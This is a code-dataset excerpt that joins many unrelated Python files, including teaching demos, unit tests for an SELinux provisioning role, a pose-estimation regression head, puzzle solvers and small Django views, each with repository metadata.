| no_license | ZimingGuo/MyNotes01 | 7698941223c79ee754b17296b9984b731858b238 | 55e6681da1a9faf9c0ec618ed60f5da9ecc6beb6 | refs/heads/master | 2022-07-30T21:30:32.100042 | 2020-05-19T16:59:09 | 2020-05-19T16:59:09 | 265,254,345 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 935 | py | # author: Ziming Guo
# time: 2020/2/15
"""
demo02:
类成员
练习:exercise03.py
"""
class ICBC:
"""
demo02:
工商银行
"""
# 表示总行的钱
total_money = 1000000 # 这不是对象的数据,这是类的数据
# 因为类方法没有对象地址self,所以不能访问实例成员
@classmethod
def print_total_money(cls):
# print(id(cls),id(ICBC))
print("总行还剩%d钱" % ICBC.total_money)
def __init__(self, name, money): # 这些才是对象的数据
self.name = name
self.money = money
# 表示从总行中扣除当前支行使用的金额
ICBC.total_money -= money
i01 = ICBC("广渠门支行", 100000)
ICBC.print_total_money()
i02 = ICBC("陶然亭支行", 100000)
# print("总行还剩%d钱" % ICBC.total_money)
# 通过类名访问类方法,会将类名传入类方法.
ICBC.print_total_money() | [
"[email protected]"
]
| |
cd15735e33041560a98ded732972d3b02180e502 | d6815f4c7774d30c5d12d2205703427693294dec | /tests/unit/more/debian/security/test_selinux.py | af2403dca31f2fdbb42f262bc50c9f76b86bba2a | [
"MIT"
]
| permissive | python-provy/provy | 2579bbedc31f559992b7c007a4a2e75424d3507f | ca3d5e96a2210daf3c1fd4b96e047efff152db14 | refs/heads/master | 2021-12-30T12:03:28.083794 | 2019-02-20T16:55:32 | 2019-02-20T16:55:32 | 1,948,340 | 16 | 3 | MIT | 2021-12-26T06:30:37 | 2011-06-24T16:01:45 | Python | UTF-8 | Python | false | false | 4,010 | py | from mock import call, patch
from nose.tools import istest
from provy.more.debian import AptitudeRole, SELinuxRole
from tests.unit.tools.helpers import ProvyTestCase
class SELinuxRoleTest(ProvyTestCase):
def setUp(self):
super(SELinuxRoleTest, self).setUp()
self.role = SELinuxRole(prov=None, context={'cleanup': []})
@istest
def provisions_correctly(self):
with self.mock_role_methods('install_packages', 'activate'):
self.role.provision()
self.role.install_packages.assert_called_with()
self.role.activate.assert_called_with()
@istest
def installs_packages_in_debian(self):
with self.using_stub(AptitudeRole) as aptitude, self.provisioning_to('debian'):
self.role.install_packages()
expected_packages = [
call('selinux-basics'),
call('selinux-policy-default'),
call('selinux-utils'),
call('auditd'),
call('audispd-plugins'),
]
self.assertEqual(aptitude.ensure_package_installed.mock_calls, expected_packages)
@istest
def installs_packages_in_ubuntu(self):
with self.using_stub(AptitudeRole) as aptitude, self.provisioning_to('ubuntu'):
self.role.install_packages()
expected_packages = [
call('selinux'),
call('selinux-utils'),
call('auditd'),
call('audispd-plugins'),
]
self.assertEqual(aptitude.ensure_package_installed.mock_calls, expected_packages)
@istest
def activates_on_debian(self):
with self.execute_mock() as execute, self.provisioning_to('debian'), patch.object(self.role, 'enforce'):
self.role.activate()
expected_calls = [
call('selinux-activate', stdout=False, sudo=True),
call("semanage login -m -s 'user_u' -r s0 __default__", stdout=False, sudo=True),
]
self.assertEqual(execute.mock_calls, expected_calls)
self.role.enforce.assert_called_with()
@istest
def activates_on_ubuntu(self):
with self.execute_mock() as execute, self.provisioning_to('ubuntu'), patch.object(self.role, 'enforce'):
self.role.activate()
expected_calls = [
call("semanage login -m -s 'user_u' -r s0 __default__", stdout=False, sudo=True),
]
self.assertEqual(execute.mock_calls, expected_calls)
self.role.enforce.assert_called_with()
@istest
def puts_environment_in_enforce_mode(self):
with self.execute_mock(), self.mock_role_method('ensure_line'), self.warn_only():
self.role.enforce()
self.role.execute.assert_called_with('setenforce 1', stdout=False, sudo=True)
self.role.ensure_line.assert_called_with('SELINUX=enforcing', '/etc/selinux/config', sudo=True)
@istest
def ensures_that_a_login_mapping_exists(self):
with self.execute_mock() as execute, self.warn_only():
self.role.ensure_login_mapping('foo')
execute.assert_called_with('semanage login -a foo', stdout=False, sudo=True)
@istest
def maps_a_login_user_to_an_selinux_user(self):
with self.execute_mock() as execute, patch.object(self.role, 'ensure_login_mapping'):
self.role.map_login('foo', 'staff_u')
self.role.ensure_login_mapping.assert_called_with('foo')
execute.assert_called_with('semanage login -m -s staff_u foo', stdout=False, sudo=True)
@istest
def maps_a_login_user_to_selinux_roles(self):
with self.execute_mock() as execute, patch.object(self.role, 'ensure_login_mapping'):
self.role.map_role('foo', ['staff_r', 'sysadm_r'])
self.role.ensure_login_mapping.assert_called_with('foo')
execute.assert_called_with("semanage user -m -R 'staff_r sysadm_r' foo", stdout=False, sudo=True)
| [
"[email protected]"
]
| |
9b6a7efd933b95b6d869bcec2a89469658c6997c | 22f480f1ec13e59f1bcf4a244973db64f875e0db | /coroutine_test.py | 42b3accced3c46d5ec3c57341d831fd9e94cd443 | []
| no_license | xiphodon/spider_hs_code | de3a4a555be2ed9dac295ef93a921c3697a6bc6a | c447c94c367c029fc13af458c668eb1f87a7b67c | refs/heads/master | 2021-12-27T23:11:07.925493 | 2021-12-16T16:41:34 | 2021-12-16T16:41:34 | 105,999,246 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,598 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/5/10 9:45
# @Author : GuoChang
# @Site : https://github.com/xiphodon
# @File : coroutine_test.py
# @Software: PyCharm
"""协程测试"""
def consumer():
print('==== c_A ====')
r = ''
while True:
print('==== c_B ====')
n = yield r
print('==== c_C ====')
if not n:
return
print('[CONSUMER] Consuming %s...' % n)
r = '200 OK'
print('==== c_D ====')
def produce(c):
print('==== p_A ====')
r = c.send(None)
print('[PRODUCER] c.send(None) %s...' % r)
n = 0
print('==== p_B ====')
while n < 5:
n = n + 1
print('[PRODUCER] Producing %s...' % n)
print('==== p_C ====')
r = c.send(n)
print('==== p_D ====')
print('[PRODUCER] Consumer return: %s' % r)
c.close()
print('==== p_E ====')
def start_1():
c = consumer()
produce(c)
def generator_1():
total = 0
while True:
x = yield
print('加', x)
if not x:
return total
total += x
def generator_2(): # 委托生成器
while True:
print('while True')
total = yield from generator_1() # 子生成器
print('加和总数是:', total)
def start_2(): # 调用方
g1 = generator_1()
g1.send(None)
g1.send(2)
g1.send(3)
g1.send(None)
def start_3():
g2 = generator_2()
g2.send(None)
g2.send(2)
g2.send(3)
g2.send(None)
if __name__ == '__main__':
# start_1()
# start_2()
start_3()
| [
"[email protected]"
]
| |
c6fd884951bb2eeb1d9b7ce2023f5052fe299ee0 | a1504798a55d652c9c0705cc507fe2cb9678ea4f | /Adavnce_CRUD/MySQL_Index/main.py | d3dc0fb9d8d0d67cb6cb139875050e8b004effdf | []
| no_license | ritikapatel1410/Python_MySql | a4a952abd7b0394eafc071de0f55efd6a7a3b359 | d90da25391243d5c08156a9184727c3e42e43517 | refs/heads/main | 2023-03-21T01:24:02.465879 | 2021-03-18T07:55:04 | 2021-03-18T07:55:04 | 347,563,406 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,533 | py | """
@Author: Ritika Patidar
@Date: 2021-03-15 00:10:10
@Last Modified by: Ritika Patidar
@Last Modified time: 2021-03-15 00:10:38
@Title : main code of perform index operation
"""
import sys
import os
sys.path.insert(0,os.path.relpath("LogFile"))
import loggerfile
from Mysql_Index import Index_Operation
def main():
"""
Description:
this function is define for mode of different operation of index
Parameter:
None
Return:
None
"""
try:
Obj_Index_Operation=Index_Operation()
mode=int(input("================================= Select Mode For index =====================================\n0 : Create Index\n====================================\n1 : Explain Index\n==============================================\n2 : Show Index\n==================================================================\n3 : Drop Index\n=============================================\n4 : quit\n=================================================================\nenter : "))
if(mode==0):
print(Obj_Index_Operation.Create_Index())
elif(mode==1):
print(Obj_Index_Operation.Explain_Index())
elif(mode==2):
Obj_Index_Operation.Show_Index()
elif(mode==3):
print(Obj_Index_Operation.Drop_Index())
elif(mode==4):
sys.exit()
loggerfile.Logger("info","succesfully select the mode")
except Exception as error:
loggerfile.Logger("error","{0} error occured".format(error))
main() | [
"[email protected]"
]
| |
19caeba9c0e61aa8f31b56683c06fdeaf2f2a064 | 6ed034d0a5e239d7b0c528b287451409ffb4a494 | /mmpose/models/heads/temporal_regression_head.py | 97a07f9cf2c9ef0497380ca5c602142b206f3b52 | [
"Apache-2.0"
]
| permissive | ViTAE-Transformer/ViTPose | 8f9462bd5bc2fb3e66de31ca1d03e5a9135cb2bf | d5216452796c90c6bc29f5c5ec0bdba94366768a | refs/heads/main | 2023-05-23T16:32:22.359076 | 2023-03-01T06:42:22 | 2023-03-01T06:42:22 | 485,999,907 | 869 | 132 | Apache-2.0 | 2023-03-01T06:42:24 | 2022-04-27T01:09:19 | Python | UTF-8 | Python | false | false | 12,400 | py | # Copyright (c) OpenMMLab. All rights reserved.
import numpy as np
import torch.nn as nn
from mmcv.cnn import build_conv_layer, constant_init, kaiming_init
from mmcv.utils.parrots_wrapper import _BatchNorm
from mmpose.core import (WeightNormClipHook, compute_similarity_transform,
fliplr_regression)
from mmpose.models.builder import HEADS, build_loss
@HEADS.register_module()
class TemporalRegressionHead(nn.Module):
"""Regression head of VideoPose3D.
"3D human pose estimation in video with temporal convolutions and
semi-supervised training", CVPR'2019.
Args:
in_channels (int): Number of input channels
num_joints (int): Number of joints
loss_keypoint (dict): Config for keypoint loss. Default: None.
max_norm (float|None): if not None, the weight of convolution layers
will be clipped to have a maximum norm of max_norm.
is_trajectory (bool): If the model only predicts root joint
position, then this arg should be set to True. In this case,
traj_loss will be calculated. Otherwise, it should be set to
False. Default: False.
"""
def __init__(self,
in_channels,
num_joints,
max_norm=None,
loss_keypoint=None,
is_trajectory=False,
train_cfg=None,
test_cfg=None):
super().__init__()
self.in_channels = in_channels
self.num_joints = num_joints
self.max_norm = max_norm
self.loss = build_loss(loss_keypoint)
self.is_trajectory = is_trajectory
if self.is_trajectory:
assert self.num_joints == 1
self.train_cfg = {} if train_cfg is None else train_cfg
self.test_cfg = {} if test_cfg is None else test_cfg
self.conv = build_conv_layer(
dict(type='Conv1d'), in_channels, num_joints * 3, 1)
if self.max_norm is not None:
# Apply weight norm clip to conv layers
weight_clip = WeightNormClipHook(self.max_norm)
for module in self.modules():
if isinstance(module, nn.modules.conv._ConvNd):
weight_clip.register(module)
@staticmethod
def _transform_inputs(x):
"""Transform inputs for decoder.
Args:
inputs (tuple or list of Tensor | Tensor): multi-level features.
Returns:
Tensor: The transformed inputs
"""
if not isinstance(x, (list, tuple)):
return x
assert len(x) > 0
# return the top-level feature of the 1D feature pyramid
return x[-1]
def forward(self, x):
"""Forward function."""
x = self._transform_inputs(x)
assert x.ndim == 3 and x.shape[2] == 1, f'Invalid shape {x.shape}'
output = self.conv(x)
N = output.shape[0]
return output.reshape(N, self.num_joints, 3)
def get_loss(self, output, target, target_weight):
"""Calculate keypoint loss.
Note:
- batch_size: N
- num_keypoints: K
Args:
output (torch.Tensor[N, K, 3]): Output keypoints.
target (torch.Tensor[N, K, 3]): Target keypoints.
target_weight (torch.Tensor[N, K, 3]):
Weights across different joint types.
If self.is_trajectory is True and target_weight is None,
target_weight will be set inversely proportional to joint
depth.
"""
losses = dict()
assert not isinstance(self.loss, nn.Sequential)
# trajectory model
if self.is_trajectory:
if target.dim() == 2:
target.unsqueeze_(1)
if target_weight is None:
target_weight = (1 / target[:, :, 2:]).expand(target.shape)
assert target.dim() == 3 and target_weight.dim() == 3
losses['traj_loss'] = self.loss(output, target, target_weight)
# pose model
else:
if target_weight is None:
target_weight = target.new_ones(target.shape)
assert target.dim() == 3 and target_weight.dim() == 3
losses['reg_loss'] = self.loss(output, target, target_weight)
return losses
def get_accuracy(self, output, target, target_weight, metas):
"""Calculate accuracy for keypoint loss.
Note:
- batch_size: N
- num_keypoints: K
Args:
output (torch.Tensor[N, K, 3]): Output keypoints.
target (torch.Tensor[N, K, 3]): Target keypoints.
target_weight (torch.Tensor[N, K, 3]):
Weights across different joint types.
metas (list(dict)): Information about data augmentation including:
- target_image_path (str): Optional, path to the image file
- target_mean (float): Optional, normalization parameter of
the target pose.
- target_std (float): Optional, normalization parameter of the
target pose.
- root_position (np.ndarray[3,1]): Optional, global
position of the root joint.
- root_index (torch.ndarray[1,]): Optional, original index of
the root joint before root-centering.
"""
accuracy = dict()
N = output.shape[0]
output_ = output.detach().cpu().numpy()
target_ = target.detach().cpu().numpy()
# Denormalize the predicted pose
if 'target_mean' in metas[0] and 'target_std' in metas[0]:
target_mean = np.stack([m['target_mean'] for m in metas])
target_std = np.stack([m['target_std'] for m in metas])
output_ = self._denormalize_joints(output_, target_mean,
target_std)
target_ = self._denormalize_joints(target_, target_mean,
target_std)
# Restore global position
if self.test_cfg.get('restore_global_position', False):
root_pos = np.stack([m['root_position'] for m in metas])
root_idx = metas[0].get('root_position_index', None)
output_ = self._restore_global_position(output_, root_pos,
root_idx)
target_ = self._restore_global_position(target_, root_pos,
root_idx)
# Get target weight
if target_weight is None:
target_weight_ = np.ones_like(target_)
else:
target_weight_ = target_weight.detach().cpu().numpy()
if self.test_cfg.get('restore_global_position', False):
root_idx = metas[0].get('root_position_index', None)
root_weight = metas[0].get('root_joint_weight', 1.0)
target_weight_ = self._restore_root_target_weight(
target_weight_, root_weight, root_idx)
mpjpe = np.mean(
np.linalg.norm((output_ - target_) * target_weight_, axis=-1))
transformed_output = np.zeros_like(output_)
for i in range(N):
transformed_output[i, :, :] = compute_similarity_transform(
output_[i, :, :], target_[i, :, :])
p_mpjpe = np.mean(
np.linalg.norm(
(transformed_output - target_) * target_weight_, axis=-1))
accuracy['mpjpe'] = output.new_tensor(mpjpe)
accuracy['p_mpjpe'] = output.new_tensor(p_mpjpe)
return accuracy
def inference_model(self, x, flip_pairs=None):
"""Inference function.
Returns:
output_regression (np.ndarray): Output regression.
Args:
x (torch.Tensor[N, K, 2]): Input features.
flip_pairs (None | list[tuple()):
Pairs of keypoints which are mirrored.
"""
output = self.forward(x)
if flip_pairs is not None:
output_regression = fliplr_regression(
output.detach().cpu().numpy(),
flip_pairs,
center_mode='static',
center_x=0)
else:
output_regression = output.detach().cpu().numpy()
return output_regression
def decode(self, metas, output):
"""Decode the keypoints from output regression.
Args:
metas (list(dict)): Information about data augmentation.
By default this includes:
- "target_image_path": path to the image file
output (np.ndarray[N, K, 3]): predicted regression vector.
metas (list(dict)): Information about data augmentation including:
- target_image_path (str): Optional, path to the image file
- target_mean (float): Optional, normalization parameter of
the target pose.
- target_std (float): Optional, normalization parameter of the
target pose.
- root_position (np.ndarray[3,1]): Optional, global
position of the root joint.
- root_index (torch.ndarray[1,]): Optional, original index of
the root joint before root-centering.
"""
# Denormalize the predicted pose
if 'target_mean' in metas[0] and 'target_std' in metas[0]:
target_mean = np.stack([m['target_mean'] for m in metas])
target_std = np.stack([m['target_std'] for m in metas])
output = self._denormalize_joints(output, target_mean, target_std)
# Restore global position
if self.test_cfg.get('restore_global_position', False):
root_pos = np.stack([m['root_position'] for m in metas])
root_idx = metas[0].get('root_position_index', None)
output = self._restore_global_position(output, root_pos, root_idx)
target_image_paths = [m.get('target_image_path', None) for m in metas]
result = {'preds': output, 'target_image_paths': target_image_paths}
return result
@staticmethod
def _denormalize_joints(x, mean, std):
"""Denormalize joint coordinates with given statistics mean and std.
Args:
x (np.ndarray[N, K, 3]): Normalized joint coordinates.
mean (np.ndarray[K, 3]): Mean value.
std (np.ndarray[K, 3]): Std value.
"""
assert x.ndim == 3
assert x.shape == mean.shape == std.shape
return x * std + mean
@staticmethod
def _restore_global_position(x, root_pos, root_idx=None):
"""Restore global position of the root-centered joints.
Args:
x (np.ndarray[N, K, 3]): root-centered joint coordinates
root_pos (np.ndarray[N,1,3]): The global position of the
root joint.
root_idx (int|None): If not none, the root joint will be inserted
back to the pose at the given index.
"""
x = x + root_pos
if root_idx is not None:
x = np.insert(x, root_idx, root_pos.squeeze(1), axis=1)
return x
@staticmethod
def _restore_root_target_weight(target_weight, root_weight, root_idx=None):
"""Restore the target weight of the root joint after the restoration of
the global position.
Args:
target_weight (np.ndarray[N, K, 1]): Target weight of relativized
joints.
root_weight (float): The target weight value of the root joint.
root_idx (int|None): If not none, the root joint weight will be
inserted back to the target weight at the given index.
"""
if root_idx is not None:
root_weight = np.full(
target_weight.shape[0], root_weight, dtype=target_weight.dtype)
target_weight = np.insert(
target_weight, root_idx, root_weight[:, None], axis=1)
return target_weight
def init_weights(self):
"""Initialize the weights."""
for m in self.modules():
if isinstance(m, nn.modules.conv._ConvNd):
kaiming_init(m, mode='fan_in', nonlinearity='relu')
elif isinstance(m, _BatchNorm):
constant_init(m, 1)
| [
"[email protected]"
]
| |
f70e05449d250838b42f4c3df78e59421ddc3543 | a2f9d55d686425c4b47ce150aa1a23ea933055cc | /apps/tinymce/views.py | 12c563915b667935e080b56611e1df8b35b9ad48 | []
| no_license | wd5/blombum | b31c581f2c36c220164901189be1ba95a8341e0e | fe11efb369fe2cec67af1e79bc8935a266df2f80 | refs/heads/master | 2020-12-25T02:23:30.297939 | 2010-06-29T10:03:31 | 2010-06-29T10:03:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 435 | py | import re
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.http import Http404, HttpResponseRedirect
from settingsDB.utils import SettingsCached
def read_path(request, path):
if re.search('(jpg|png|jpeg|gif)$', path):
return HttpResponseRedirect(SettingsCached.param.STATIC_URL+'js/tinymce/'+path)
return render_to_response('tinymce/'+path, RequestContext(request))
| [
"[email protected]"
]
| |
b7bf34e25705b43a0a78936098833e47fe524ace | 96fe7cb1495928a9699ade24200b445755e47f3b | /tests/unit/model/test_code_element_role.py | 62f8ec8dfa551f1d335a31db5755fcbc031c51df | [
"Apache-2.0"
]
| permissive | Midnighter/structurizr-python | ab4a9f71c01d1febde5c6e61a3a961953f1ef440 | 31f1dcadb3ff113d8a77ce132657237ea01c307b | refs/heads/devel | 2023-02-08T19:43:22.344155 | 2023-01-21T10:12:49 | 2023-01-21T10:12:49 | 144,895,441 | 61 | 16 | Apache-2.0 | 2023-01-21T09:53:35 | 2018-08-15T19:35:01 | Python | UTF-8 | Python | false | false | 1,037 | py | # Copyright (c) 2020, Moritz E. Beber.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Ensure the expected behaviour of the code element role enumeration."""
import pytest
from structurizr.model.code_element_role import CodeElementRole
@pytest.mark.parametrize(
"role, expected",
[("Primary", CodeElementRole.Primary), ("Supporting", CodeElementRole.Supporting)],
)
def test_location(role: str, expected: CodeElementRole):
"""Expect proper initialization from string."""
assert CodeElementRole(role) == expected
| [
"[email protected]"
]
| |
32a23f9df83cc51dbe7edb439bd22dbc167ade77 | 13d222bc3332378d433835914da26ed16b583c8b | /src/pemjh/challenge116/main.py | 83123ed7d1f367503d574aa5a8a7a8a0a060e775 | []
| no_license | mattjhussey/pemjh | c27a09bab09cd2ade31dc23fffac07374bea9366 | 2ebb0a525d2d1c0ee28e83fdc2638c2bec97ac99 | refs/heads/master | 2023-04-16T03:08:59.390698 | 2023-04-08T10:54:00 | 2023-04-08T10:54:00 | 204,912,926 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 916 | py | """ Challenge116 """
# pylint: disable=missing-docstring
from pemjh.function_tools import memoize
@memoize()
def num_variations(blocks, tile_size, dec=True):
num = 0
if blocks > 1:
# work out with tile here
if blocks >= tile_size:
num += num_variations(blocks - tile_size,
tile_size,
False)
# work out with tile not here
num += num_variations(blocks - 1, tile_size, False)
else:
num = 1
if dec:
num -= 1
return num
def process(blocks):
num_2_variations = num_variations(blocks, 2)
num_3_variations = num_variations(blocks, 3)
num_4_variations = num_variations(blocks, 4)
return num_2_variations + num_3_variations + num_4_variations
def main(blocks):
""" challenge116 """
return process(blocks)
| [
"[email protected]"
]
| |
02eaf3db773ab02db6f4b89bf7367f023bcb00d3 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/adjectives/_aggregated.py | fad5b0d4f6fa9ecaef3cf929a8aed423b13aacbd | [
"MIT"
]
| permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 269 | py |
from xai.brain.wordbase.adjectives._aggregate import _AGGREGATE
#calss header
class _AGGREGATED(_AGGREGATE, ):
def __init__(self,):
_AGGREGATE.__init__(self)
self.name = "AGGREGATED"
self.specie = 'adjectives'
self.basic = "aggregate"
self.jsondata = {}
| [
"[email protected]"
]
| |
bd0ddc98cc185bd0c345391c4fd04ccb8f855b0f | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /rnvBtoNMBtznXLhs8_24.py | 3666f1e694da00a3301b67e01f1e0199407af097 | []
| no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 313 | py |
def win_round(you, opp):
res = []
for item in [you, opp]:
first = max(item)
item.remove(first)
second = max(item)
res.append(int(str(first) + str(second)))
you_score, opp_score = res
if you_score > opp_score:
return True
return False
| [
"[email protected]"
]
| |
297a221039f6223d99486f0a5574016946b8bb72 | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_5670465267826688_1/Python/Saaber/saber_dijkstra.py | 07db2c9ea613fb670076171aa5363a1bcd777e85 | []
| no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 2,509 | py | d = {'11':'1', '1i':'i', '1j':'j', '1k':'k', \
'i1':'i', 'ii':'-1' , 'ij':'k', 'ik':'-j', \
'j1':'j', 'ji':'-k' , 'jj':'-1', 'jk':'i', \
'k1':'k', 'ki':'j' , 'kj':'-i', 'kk':'-1' }
def evaluate(s1, s2):
neg1, neg2 = s1.count('-') , s2.count('-')
t1, t2 = s1.replace('-',''), s2.replace('-','')
neg = neg1 + neg2
key = t1 + t2
res = d[key]
if (neg % 2) == 1:
if res[0] == '-':
res = res[1:]
else:
res = '-' + res
return res
def evaluate_substring(substr, result, flag_i, flag_ij):
if result == 'i':
flag_i = True
for i in xrange( len(substr)):
result = evaluate(result, substr[i])
if result == 'i' and flag_i == False:
flag_i = True
if result == 'k' and flag_i == True:
flag_ij = True
return result, flag_i, flag_ij
def power(a, b):
result = 1
ijop = 1
if b == 1 or a == '1':
return a
if a not in ['-1' , '1']:
result = evaluate(a, a)
result = pow(int(result) , int(b/2))
if (b %2 ) == 1:
result = evaluate(str(result), a)
else:
if (b % 2) == 0:
result = 1
else:
result = -1
ijop = -1
return str(result)
def evaluate_string(x, repeat):
res, flag_i, flag_ij = '1', False, False
f_r = 1
#first resylt null
res_x = ''
for i in xrange(repeat):
res, flag_i, flag_ij = evaluate_substring(x, res, flag_i, flag_ij)
if i == 0:
res_x = res
p = power(res, repeat)
#print ' p = ' + str(p)
if p != '-1':
return False
# for sure if it didn't find i and j, then it can't find it anymore
if i > 100000:
return False
if flag_i == True and flag_ij == True:
return True
if res == '-1' and flag_ij == True:
return True
return False
def main():
f_name = 'C-large.in.txt'
fh = open(f_name, 'rt')
line = fh.readline()
test_cases = int(line)
result = ''
for i in xrange(1, test_cases+ 1):
line1 = fh.readline().replace('\n','')
line2 = fh.readline().replace('\n','')
repeat = int(line1.split(' ')[1])
string = ''
if len(line2) * repeat < 4:
string = str(line2) * repeat
if len(string) < 3:
result += 'Case #' + str(i) + ": NO\n"
continue
elif len(string) == 3:
if string == 'ijk':
result += 'Case #' + str(i ) + ": YES\n"
continue
else:
result += 'Case #' + str(i ) + ": NO\n"
continue
eval_str = evaluate_string(line2, repeat)
if eval_str == True:
result += 'Case #' + str( i ) + ": YES\n"
else:
result += 'Case #' + str(i ) + ": NO\n"
print result
fh.close()
f = open('saber_dijkstra.out', 'w')
f.write(result)
f.close()
main()
| [
"[email protected]"
]
| |
03ee163b9ac703119f8282805997115dac007738 | b6e5a79533b23404bf1582e9c66f4d1a9500b992 | /backend/usa_2_go_27981/wsgi.py | 067e6d4e56f68e483302e5793560ba8a17439f18 | []
| no_license | crowdbotics-apps/usa-2-go-27981 | 766add8314ebdeddfcc90ba2fe0185f66f247493 | 18ba1fa997814462fc7810b01c413cd7655c758b | refs/heads/master | 2023-05-27T10:25:39.406088 | 2021-06-15T01:03:53 | 2021-06-15T01:03:53 | 376,992,929 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 405 | py | """
WSGI config for usa_2_go_27981 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "usa_2_go_27981.settings")
application = get_wsgi_application()
| [
"[email protected]"
]
| |
fa02064419c1a25d7bb488b52884e661e606158d | 24e390b6b3ac60baa5ee784cc017848e7e6e8426 | /old_exercises/backup/plotlable.py | 78c3ebcb682d03d9a38f071e66fad895ae411985 | []
| no_license | tertiarycourses/NumpySciPyTraining | 6c83d91f7164e9cd3020fd987c55d15d93f2fcf3 | 0b45296cf07751938594973dd7fdc39d0daa04a1 | refs/heads/master | 2021-01-23T00:40:12.393829 | 2018-05-17T09:10:51 | 2018-05-17T09:10:51 | 92,831,280 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 173 | py | import numpy
import matplotlib.pyplot as plt
x=numpy.linspace(0,2*numpy.pi,32)
plt.plot(x, numpy.sin(x))
plt.xlabel('x')
plt.ylabel('y')
plt.title('Sine Curve')
plt.show()
| [
"[email protected]"
]
| |
9b0c90269a0a5ff5f89369b8ca2e2d59d97665fe | 7c0acdc46cfce5dc116d394f6990ee5ab1c0fa0c | /venv/lib/python3.7/site-packages/buildsystem/setup.py | 3e4ac13dece62dd1ea8f1f0ac6fe7d644541d600 | [
"MIT"
]
| permissive | Vatansever27/ExchangeCode | 84fb4a02371fdda7cd94d00971be76bcd1068be0 | ab284653a337937139a9a28c036efe701fb376c7 | refs/heads/master | 2020-04-07T16:38:59.819929 | 2018-11-21T12:18:30 | 2018-11-21T12:18:30 | 158,537,067 | 0 | 0 | null | 2018-11-21T12:18:31 | 2018-11-21T11:22:14 | null | UTF-8 | Python | false | false | 1,093 | py | from .base import BaseBuilder, task
import os
class SetupBuilder(BaseBuilder):
setupdir = '.'
setupscript = None
product_title = 'Setup'
@task('compile_setup')
def do_compile_setup(self):
'''Compiles the Inno Setup Script `setupscript` into directory `setupdir` if `setupscript` is specified and exists.
`setupscript` has to be defined based on the directory `setupdir`.'''
if self.setupscript and os.path.exists(os.path.join(self.setupdir, self.setupscript)):
d = os.getcwd()
os.chdir(self.setupdir)
# write version information into git.txt
with open('git.txt', 'w') as f:
f.write(self.version)
# run setup
self.run([r'C:\Program Files (x86)\Inno Setup 5\ISCC.exe', self.setupscript])
# remove git.txt
os.remove('git.txt')
os.chdir(d)
else:
raise Exception('Setup script does not exist: %s' % os.path.join(self.setupdir, self.setupscript))
| [
"[email protected]"
]
| |
c88e91b305ed920b0d4f97c56d7ec0ebf48c216c | 20c67cd43a484819b13cb120f145def9bc1317d8 | /usermage/views.py | d3063cfebd5ca6ec7725f323504b5493b4885c36 | []
| no_license | totota/trade | 03c019f92df8846f47a1cee2a1c2b16fbcb5a50c | b690d51f05316d0b6f4cdcb01806ad79d3c1f4be | refs/heads/master | 2021-09-02T06:43:49.175307 | 2017-10-16T11:04:01 | 2017-10-16T11:04:01 | 108,209,337 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,379 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.http import HttpResponseRedirect,HttpResponse
from django.shortcuts import render
from .forms import registeruser,loginform
from dms.models import city,location,security,campus,user,commodity,collection,indent,delegation,delegation_order
def adduser(request):
if request.method=='POST':
form=registeruser(request.POST)
print form
print 'post'
if form.is_valid():
print type(user.objects.filter(username=form.cleaned_data['username']))
if form.cleaned_data['password'] ==form.cleaned_data['ageinpassword']:
print 'password is right'
else:
#print "password error"
information='ok'
return HttpResponse(information)
if user.objects.filter(username=form.cleaned_data['username']):
#print "yonghuchongfu"
information='用户名已经存在'
return render(request,'usermas/regins.html',{'information':information})
if campus.objects.filter(name='default'):
default=campus.objects.get(name='default')
#print 'have default'
else:
default=campus(name='default')
default.save()
#print 'no default'
if location.objects.filter(extra='default'):
defaultlocation=location.objects.get(extra='default')
#print 'have default'
else:
defaultcity=city(province='default',country='default',cityname='default')
defaultcity.save()
defaultlocation=location(extra='default',cityid=defaultcity)
defaultlocation.save()
#print 'no default'
uniquequery=request.POST.get('unique','null')
mysecurity=security(password=form.cleaned_data['password'],tel=form.cleaned_data['phone'],email=form.cleaned_data['email'])
mysecurity.save()
myuser=user(username=form.cleaned_data['username'],age=0,unique=uniquequery,security_id=mysecurity,campus_id=default,addressid=defaultlocation,locationid=defaultlocation)
myuser.save()
information='save ok'
